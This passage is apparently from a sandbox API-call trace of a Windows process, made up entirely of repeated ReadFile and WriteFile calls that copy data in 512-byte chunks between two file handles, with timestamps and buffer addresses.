lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.022] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.023] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.023] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.024] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.024] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.025] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.025] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.026] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.026] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.027] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.027] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.028] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.029] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.029] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.030] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.031] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.031] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.032] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.032] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.033] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.033] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.034] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.034] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.035] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.035] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.036] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.036] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.037] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.037] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.038] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.038] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.039] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.039] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.039] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.040] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.040] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.041] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.041] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.042] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.042] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.043] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.043] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.044] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.044] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.045] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.045] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.046] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.046] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.047] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.047] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.048] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.048] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.049] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.049] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.050] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.050] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.051] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.051] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.052] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.053] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.053] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.054] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.054] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.055] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.055] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.056] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.056] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.057] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.057] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.058] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.058] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.059] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.059] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.060] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.060] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.061] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.061] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.062] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.062] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.063] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.063] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.064] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.064] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.065] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.065] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.066] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.066] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.067] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.067] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.068] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.068] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.069] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0026.069] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0026.070] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, 